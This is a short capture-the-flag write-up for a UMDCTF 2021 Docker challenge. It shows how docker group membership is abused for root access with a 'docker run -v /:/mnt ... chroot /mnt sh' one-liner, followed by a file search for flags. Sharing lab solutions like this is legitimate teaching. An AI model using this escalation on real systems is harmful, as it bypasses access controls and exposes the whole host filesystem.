Posted on April 18, 2021

Donnie Docker | Forensics


From ctf description we have got credentials to ssh connection: > ssh user@chals2.umdctf.io -p 5000
> password: umdctf

After successful login with given credentials, I saw docker machine.
Firstly I checked where I am ( pwd command) and to which groups I belong ( id command).

uid=1000(user) gid=1000(user) groups=1000(user),999(docker)

I saw that I belong to docker group, so I follow this lead. I assume If I am in this group I probably could use docker commands. From previous ctf’s I known some cool website where I found how to get root shell with privileges to run docker

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Running command above resulted with root account that gives me access to everything inside docker container. Now I have to find file with flag. > file / -name *.txt 2>/dev/null

This command listed all files with .txt extension, which gives me some garbage and three flag.txt files:

/var/lib/docker/vfs/dir/c53fadd9c7a3f33d711b573de585b367e45d6a4de64e677ab8ffc1bf6112fbff/flag.txt /var/lib/docker/vfs/dir/c53fadd9c7a3f33d711b573de585b367e45d6a4de64e677ab8ffc1bf6112fbff-init/flag.txt /var/lib/docker/vfs/dir/9a2432327f4d149162a06da63a797e0b88a8c2bccac598f262ebb6d073b9ecda/flag.txt





CC BY 4.0 WaletSec + HuntClauss